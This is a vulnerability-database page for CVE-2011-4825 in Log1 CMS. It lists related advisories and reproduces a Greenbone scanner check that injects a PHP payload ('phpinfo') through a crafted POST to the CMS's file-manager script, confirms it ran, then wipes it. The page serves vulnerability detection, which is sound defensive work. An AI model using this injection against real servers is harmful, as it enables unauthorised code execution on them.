| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| Log1 CMS writeInfo() PHP Code Injection | 3 Jun 201200:00 | – | zdt | |
| CVE-2011-4825 | 4 Nov 201100:00 | – | circl | |
| Log1 CMS writeInfo() PHP Code Injection (CVE-2011-4825) | 28 Oct 201300:00 | – | checkpoint_advisories | |
| CVE-2011-4825 | 15 Dec 201102:00 | – | cve | |
| CVE-2011-4825 | 15 Dec 201102:00 | – | cvelist | |
| phpMyFAQ 2.7.0 RCE | 27 Apr 201200:00 | – | dsquare | |
| Log1 CMS 2.0 RCE | 26 Jun 201200:00 | – | dsquare | |
| Log1 CMS - 'writeInfo()' PHP Code Injection (Metasploit) | 3 Jun 201200:00 | – | exploitdb | |
| Log1 CMS writeInfo() PHP Code Injection | 2 Jun 201206:51 | – | metasploit | |
| CVE-2011-4825 | 15 Dec 201103:57 | – | nvd |
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/bid/50523 |
# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.103496");
script_version("2025-01-21T05:37:33+0000");
script_tag(name:"last_modification", value:"2025-01-21 05:37:33 +0000 (Tue, 21 Jan 2025)");
script_tag(name:"creation_date", value:"2012-06-18 17:36:01 +0100 (Mon, 18 Jun 2012)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2011-4825");
script_tag(name:"qod_type", value:"remote_app");
script_tag(name:"solution_type", value:"WillNotFix");
script_name("Log1 CMS <= 2.0 PHP Code Injection Vulnerability - Active Check");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2012 Greenbone AG");
script_family("Web application abuses");
script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl", "DDI_Directory_Scanner.nasl", "gb_php_http_detect.nasl", "global_settings.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_tag(name:"summary", value:"Log1 CMS is prone to a remote PHP code injection
vulnerability.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");
script_tag(name:"impact", value:"An attacker can exploit this issue to inject and execute
arbitrary PHP code in the context of the affected application. This may facilitate a compromise
of the application and the underlying system, other attacks are also possible.");
script_tag(name:"affected", value:"Log1 CMS version 2.0 and probably prior.");
script_tag(name:"solution", value:"No known solution was made available for at least one year
since the disclosure of this vulnerability. Likely none will be provided anymore. General
solution options are to upgrade to a newer release, disable respective features, remove the
product or replace the product by another one.");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/50523");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("list_array_func.inc");
include("port_service_func.inc");
port = http_get_port( default:80 );
if( ! http_can_host_php( port:port ) )
exit( 0 );
host = http_host_name( port:port );
ex = "bla=1&blub=2&foo=<?php phpinfo(); ?>";
foreach dir( make_list_unique( "/cms", http_cgi_dirs( port:port ) ) ) {
if( dir == "/" )
dir = "";
res = http_get_cache( port:port, item:dir + "/index.php" );
if( ! res || res !~ "^HTTP/1\.[01] 200" )
continue;
filename = dir + "/admin/libraries/ajaxfilemanager/ajax_create_folder.php";
req = string("POST ", filename, " HTTP/1.1\r\n",
"Host: ", host, "\r\n",
"Accept-Encoding: identity\r\n",
"Content-Type: application/x-www-form-urlencoded\r\n",
"Content-Length: ", strlen(ex),
"\r\n\r\n",
ex);
result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
if(result =~ "^HTTP/1\.[01] 200") {
url = dir + "/admin/libraries/ajaxfilemanager/inc/data.php";
req = http_get( item:url, port:port );
res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );
if( "<title>phpinfo()" >< res ) {
# clean the data.php on success by sending empty POST...
ex = string("");
req = string("POST ", filename, " HTTP/1.1\r\n",
"Host: ", host, "\r\n",
"Accept-Encoding: identity\r\n",
"Content-Type: application/x-www-form-urlencoded\r\n",
"Content-Length: ", strlen(ex),
"\r\n\r\n",
ex);
http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );
report = http_report_vuln_url( port:port, url:url );
security_message( port:port, data:report );
exit( 0 );
}
}
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation